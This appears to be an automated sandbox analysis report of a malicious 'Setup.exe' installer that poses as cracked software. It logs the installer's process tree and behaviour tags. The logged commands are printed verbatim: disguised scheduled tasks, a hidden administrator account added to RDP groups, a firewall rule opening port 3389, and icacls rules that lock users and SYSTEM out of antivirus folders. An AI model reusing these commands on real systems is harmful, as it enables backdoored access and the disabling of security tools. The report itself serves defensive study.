firefox.exeCrack.exeupdate.exewin.exesvchost.exeIP.exesmss.exewinserv.exewinserv.exeRDPWinst.exewinserv.exepid Process 2940 firefox.exe 2940 firefox.exe 2940 firefox.exe 2940 firefox.exe 6576 Crack.exe 6624 update.exe 5132 win.exe 7136 svchost.exe 5676 IP.exe 5484 smss.exe 4600 winserv.exe 4600 winserv.exe 4600 winserv.exe 4600 winserv.exe 4600 winserv.exe 5172 winserv.exe 5172 winserv.exe 5172 winserv.exe 5172 winserv.exe 5348 RDPWinst.exe 6664 winserv.exe 6664 winserv.exe 6664 winserv.exe 6664 winserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
firefox.exefirefox.exedescription pid Process procid_target PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 4956 wrote to memory of 2940 4956 firefox.exe 94 PID 2940 wrote to memory of 3908 2940 firefox.exe 95 PID 2940 wrote to memory of 3908 2940 firefox.exe 95 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 5112 2940 firefox.exe 96 PID 2940 wrote to memory of 3508 2940 firefox.exe 97 PID 2940 wrote to memory of 3508 2940 firefox.exe 97 PID 2940 wrote to memory of 3508 2940 firefox.exe 97 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\AutoIt-Extractor-net40-x64.exe"C:\Users\Admin\AppData\Local\Temp\AutoIt-Extractor-net40-x64.exe"1⤵PID:332
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.0.1060112846\1864619824" -parentBuildID 20221007134813 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0a88c22-de31-4b0f-8392-a84f13ab91be} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 1964 1f6bb8cc758 gpu3⤵PID:3908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.1.894055126\1692423142" -parentBuildID 20221007134813 -prefsHandle 2352 -prefMapHandle 2340 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4de3356a-53f3-40e0-a478-5cae6cbdc5c2} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2364 1f6bb233558 socket3⤵
- Checks processor information in registry
PID:5112
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.2.1659485514\1669713410" -childID 1 -isForBrowser -prefsHandle 3252 -prefMapHandle 3248 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8018c9e5-9683-455b-9dc3-26d3a40166ff} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 3264 1f6bf779b58 tab3⤵PID:3508
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.3.1480727224\1854720312" -childID 2 -isForBrowser -prefsHandle 3632 -prefMapHandle 3628 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db950dac-f7e3-4986-93c4-65beb4bdd642} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 3644 1f6bde9e858 tab3⤵PID:3624
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.4.1498262898\1898091195" -childID 3 -isForBrowser -prefsHandle 4604 -prefMapHandle 4600 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed2765ff-6f51-4d63-948b-4f50334da547} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 4260 1f6c0f8e858 tab3⤵PID:1708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.5.1851941882\408062777" -childID 4 -isForBrowser -prefsHandle 4320 -prefMapHandle 4980 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f8f49db-609d-48c2-a8ef-5c6b9efffa4e} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2844 1f6be20b858 tab3⤵PID:4064
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.6.912555074\1036222770" -childID 5 -isForBrowser -prefsHandle 5116 -prefMapHandle 5016 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82c61f07-ecce-468d-8b6e-43c710a91469} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 4600 1f6be20ca58 tab3⤵PID:3604
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.7.1162921940\1451388421" -childID 6 -isForBrowser -prefsHandle 5344 -prefMapHandle 5348 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d0c8603-8714-4fde-a336-fb6a9f55ea37} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 5336 1f6be20cd58 tab3⤵PID:2164
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2940.8.1202514959\812861856" -childID 7 -isForBrowser -prefsHandle 5784 -prefMapHandle 2788 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7525a20e-121b-4b22-bbe0-bc939e8ee03d} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 2964 1f6bf8bd858 tab3⤵PID:5816
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3736 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:81⤵PID:6132
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3532
-
C:\Users\Admin\Desktop\john\Setup.exe"C:\Users\Admin\Desktop\john\Setup.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6292 -
C:\Users\Admin\Desktop\john\SoftwareInstall.exeC:\Users\Admin\Desktop\john\SoftwareInstall.exe2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:6360
-
-
C:\ProgramData\Setup\install.exeC:\ProgramData\Setup\install.exe -pkasoft2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6428 -
C:\ProgramData\Setup\Crack.exe"C:\ProgramData\Setup\Crack.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6576
-
-
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6624 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ServiceManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:6732
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CashClean" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1812
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\MasterData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:5388
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:5340
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:1572
-
-
C:\ProgramData\Microsoft\win.exeC:\ProgramData\Microsoft\win.exe -ppidar4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5132
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\FilesystemY\RecoveryHosts" /TR "C:\ProgramData\Microsoft\MapData\QouW64\FilesystemY.bat" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:6936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)4⤵PID:5272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵PID:6988
-
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:7036
-
-
-
C:\ProgramData\Setup\svchost.exeC:\ProgramData\Setup\svchost.exe -ppidar4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7136 -
C:\ProgramData\Setup\IP.exe"C:\ProgramData\Setup\IP.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5676 -
C:\Windows\SysWOW64\unsecapp.exeC:\Windows\SysWOW64\unsecapp.exe6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:440
-
-
-
C:\ProgramData\Setup\smss.exe"C:\ProgramData\Setup\smss.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:5484 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST6⤵
- Creates scheduled task(s)
PID:5608
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST6⤵
- Creates scheduled task(s)
PID:6644
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4600 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add6⤵PID:2080
-
C:\Windows\system32\net.exenet user John 12345 /add7⤵PID:3048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add8⤵PID:456
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add6⤵PID:2760
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add7⤵PID:4892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add8⤵PID:1332
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add6⤵PID:1804
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add7⤵PID:4576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add8⤵PID:5868
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add6⤵PID:5176
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add7⤵PID:4132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add8⤵PID:2604
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add6⤵PID:5784
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add7⤵PID:4632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add8⤵PID:5924
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add6⤵PID:2356
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add7⤵PID:1764
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add8⤵PID:5884
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add6⤵PID:4656
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add7⤵PID:6096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add8⤵PID:32
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i6⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5348 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow7⤵
- Modifies Windows Firewall
PID:1708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat6⤵PID:4184
-
C:\Windows\system32\timeout.exetimeout 107⤵
- Delays execution with timeout.exe
PID:5560
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)4⤵PID:5952
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:7120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵PID:2288
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵PID:4848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)4⤵PID:2296
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)5⤵PID:3548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵PID:5220
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)4⤵PID:5560
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵PID:1844
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)4⤵PID:4500
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵PID:5196
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)4⤵PID:4516
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵PID:2096
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵PID:6424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)4⤵PID:3780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵PID:6224
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵PID:6616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)4⤵PID:6212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵PID:6388
-
C:\Windows\system32\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
- Modifies file permissions
PID:3400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)4⤵PID:6340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵PID:5088
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵PID:6592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)4⤵PID:6604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵PID:6536
-
C:\Windows\system32\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)4⤵PID:2120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)4⤵PID:6312
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)4⤵PID:3652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)4⤵PID:5716
-
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)4⤵PID:5388
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)4⤵PID:636
-
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:6864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)4⤵PID:6896
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)4⤵PID:6196
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:7012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵PID:4756
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)4⤵PID:6244
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)4⤵PID:6252
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)4⤵PID:5696
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵PID:1072
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵PID:6140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵PID:6720
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵PID:1512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵PID:6684
-
